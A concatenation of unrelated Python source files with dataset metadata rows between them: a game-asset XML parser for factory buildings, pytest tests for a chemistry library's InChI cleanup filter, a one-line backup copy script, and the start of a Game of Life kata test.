<CycleTime>NaturalInteger(Default 30)</CycleTime> the time of a production cycle (second)
</FactoryBase>
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
:param node: the FactoryBase node
"""
if node.CycleTime:
production_time = int(node.CycleTime.string) / 60.0
else:
production_time = 0.5
self.values['inputs'] = list()
if node.FactoryInputs:
for item in node.FactoryInputs("Item"):
input1 = dict()
input1['id'] = int(item.Product.string)
input1['amount'] = int(item.Amount.string)
input1['amount_per_minute'] = float(input1['amount']) / production_time
input1['storage_amount'] = float(item.StorageAmount.string)
self.values['inputs'].append(input1)
self.values['outputs'] = list()
for item in node.FactoryOutputs("Item"):
output = dict()
output['id'] = int(item.Product.string)
output['amount'] = int(item.Amount.string)
output['amount_per_minute'] = float(output['amount']) / production_time
output['storage_amount'] = float(item.StorageAmount.string)
self.values['outputs'].append(output)
self.values['production_time'] = production_time
def parse_node_maintenance(self, node: bs4.Tag):
"""
<Maintenance>
<ConsumerPriority>1</ConsumerPriority> ?
<Maintenances> * products (money, workforce, etc.) used for factory maintenance
<Item>
<Product>GUID</Product> * GUID of the product
<Amount>NaturalInteger</Amount> * amount of product consumed per minute(?)
<InactiveAmount>NaturalInteger(Default 0)</InactiveAmount> amount of product consumed per minute(?)
when the factory is paused
<ShutdownThreshold>Float(Default 0)</ShutdownThreshold> the factory will be shutdown if workforce fulfill
rate is less than this threshold
</Item>
...
</Maintenances>
</Maintenance>
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
:param node: the Maintenance node
"""
self.values['maintenances'] = list()
for item in node.Maintenances("Item"):
maintenance = dict()
maintenance['id'] = int(item.Product.string)
maintenance['amount'] = int(item.Amount.string)
if item.InactiveAmount:
maintenance['inactive_amount'] = int(item.InactiveAmount.string)
else:
maintenance['inactive_amount'] = 0
if item.ShutdownThreshold:
maintenance['shutdown_threshold'] = float(item.ShutdownThreshold.string)
else:
maintenance['shutdown_threshold'] = 0.0
self.values['maintenances'].append(maintenance)
class FarmBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking /> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<ModuleOwner .../> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<IncidentInfectable .../> *
<Pausable /> *
<Culture .../> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "FarmBuilding"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
class FreeAreaBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<FreeAreaProductivity .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<ItemGenerator /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "FreeAreaBuilding"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
class HeavyFreeAreaBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<IncidentInfluencer .../> *
<FreeAreaProductivity .../> *
<Electric /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "HeavyFreeAreaBuilding"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
class FactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Electric /> *
<Culture .../> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "FactoryBuilding7"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
class HeavyFactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<IncidentInfluencer .../> *
<Electric /> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "HeavyFactoryBuilding"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
class SlotFactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<Slot /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<Electric /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
template_name = "SlotFactoryBuilding7"
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
| 48.444444 | 121 | 0.554472 | 3,104 | 36,624 | 6.495168 | 0.082474 | 0.038837 | 0.051337 | 0.038788 | 0.786717 | 0.77268 | 0.767521 | 0.75899 | 0.753931 | 0.753931 | 0 | 0.011531 | 0.367792 | 36,624 | 755 | 122 | 48.508609 | 0.859204 | 0.80663 | 0 | 0.217949 | 0 | 0 | 0.107132 | 0.006215 | 0 | 0 | 0 | 0.031788 | 0 | 1 | 0.141026 | false | 0 | 0.038462 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa2069dadf178b6afe01e7f3454292c540efb4b3 | 2,192 | py | Python | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | null | null | null | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | 23 | 2020-03-16T13:47:00.000Z | 2020-03-19T13:34:27.000Z | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | null | null | null | import numpy
from matchms import Spectrum
from matchms.filtering import harmonize_undefined_inchi
def test_harmonize_undefined_inchi_empty_string():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": ""})
spectrum = harmonize_undefined_inchi(spectrum_in)
assert spectrum.get("inchi") == ""
def test_harmonize_undefined_inchi_na_1():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": "n/a"})
spectrum = harmonize_undefined_inchi(spectrum_in)
assert spectrum.get("inchi") == ""
def test_harmonize_undefined_inchi_na_2():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": "N/A"})
spectrum = harmonize_undefined_inchi(spectrum_in)
assert spectrum.get("inchi") == ""
def test_harmonize_undefined_inchi_na_3():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": "NA"})
spectrum = harmonize_undefined_inchi(spectrum_in)
assert spectrum.get("inchi") == ""
def test_harmonize_undefined_inchi_alias_nan():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": "nan"})
spectrum = harmonize_undefined_inchi(spectrum_in, aliases=["nodata", "NaN", "Nan", "nan"])
assert spectrum.get("inchi") == ""
def test_harmonize_undefined_inchi_alias_nan_undefined_is_na():
spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
intensities=numpy.array([], dtype="float"),
metadata={"inchi": "nan"})
spectrum = harmonize_undefined_inchi(spectrum_in, aliases=["nodata", "NaN", "Nan", "nan"], undefined="n/a")
assert spectrum.get("inchi") == "n/a"
| 34.25 | 111 | 0.604015 | 230 | 2,192 | 5.5 | 0.143478 | 0.18498 | 0.236364 | 0.189723 | 0.886166 | 0.886166 | 0.858498 | 0.858498 | 0.858498 | 0.858498 | 0 | 0.001817 | 0.246807 | 2,192 | 63 | 112 | 34.793651 | 0.764385 | 0 | 0 | 0.589744 | 0 | 0 | 0.077555 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fa6d2e9b35e57f7715152260b274fe7ea3613212 | 140 | py | Python | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | null | null | null | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | null | null | null | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | 1 | 2020-09-03T21:19:34.000Z | 2020-09-03T21:19:34.000Z | import subprocess
subprocess.call(["cp", "c:/Users/anthony/AppData/Roaming/High Fidelity/assignment-client/entities/models.json.gz", "."])
| 35 | 120 | 0.764286 | 18 | 140 | 5.944444 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 140 | 3 | 121 | 46.666667 | 0.804511 | 0 | 0 | 0 | 0 | 0.5 | 0.65 | 0.621429 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d75c00156d7db1f7d078d319140f877e220a4755 | 8,076 | py | Python | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | 4 | 2021-04-08T14:14:04.000Z | 2021-09-08T07:57:38.000Z | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | null | null | null | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | null | null | null | import pytest
from django.test import TestCase, override_settings
from .utils import MIDDLEWARES_FOR_TESTING
class TestHttpResponseFunctionWithoutUserMiddleware(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestHttpResponseFunctionWithUserMiddleware(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/simple/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/simple/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/simple_with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
class TestHttpResponseClassWithoutUserMiddleware(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestHttpResponseClassWithUserMiddleware(TestCase):
def test_middleware_simple_get_request(self):
try:
self.client.get('/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_request(self):
try:
self.client.post('/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_request(self):
try:
self.client.put('/simple/class/', data={'data': 'data'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_request(self):
try:
self.client.delete('/simple/class/')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_get_with_query_string_request(self):
try:
self.client.get('/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_post_with_query_string_request(self):
try:
self.client.post('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_put_with_query_string_request(self):
try:
self.client.put('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
except Exception as e:
pytest.fail(f"Error: {e}")
def test_middleware_simple_delete_with_query_string_request(self):
try:
self.client.delete('/simple/class/with_query_string/', {'data': 'data'})
except Exception as e:
pytest.fail(f"Error: {e}") | 38.274882 | 140 | 0.630882 | 983 | 8,076 | 4.921668 | 0.043744 | 0.079372 | 0.112443 | 0.152129 | 0.944192 | 0.944192 | 0.944192 | 0.944192 | 0.944192 | 0.944192 | 0 | 0 | 0.242447 | 8,076 | 211 | 141 | 38.274882 | 0.790781 | 0 | 0 | 0.95858 | 0 | 0 | 0.194131 | 0.067352 | 0 | 0 | 0 | 0 | 0 | 1 | 0.189349 | false | 0 | 0.017751 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad777522cf6148adfb4b6267fd279c9591878812 | 5,309 | py | Python | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 12 | 2016-12-27T19:41:46.000Z | 2020-06-02T19:14:26.000Z | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 1 | 2020-08-18T20:58:29.000Z | 2020-08-19T05:31:40.000Z | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 2 | 2020-08-18T20:23:59.000Z | 2021-08-01T13:35:02.000Z | from grid_linebuffer import Grid
"""
Game of Life kata (inside out approach)
"""
# grid setup
def test_setups_an_NxM_grid_with_width_N_4_and_height_M_3():
grid = Grid(width=4, height=3)
assert len(grid.matrix) == 3*4
def test_setups_an_square_3x3_grid():
grid = Grid(width=3, height=3)
assert len(grid.matrix) == 3*3
def test_creates_a_new_grid_filled_with_empty_cells():
grid = Grid(width=3, height=3)
for cell in grid.matrix:
assert cell == 0
# populating cells
def test_on_a_1x1_grid_populates_the_position():
grid = Grid(width=1, height=1)
assert grid.get_cell(0, 0) == 0
grid.populate_cells([(0, 0)])
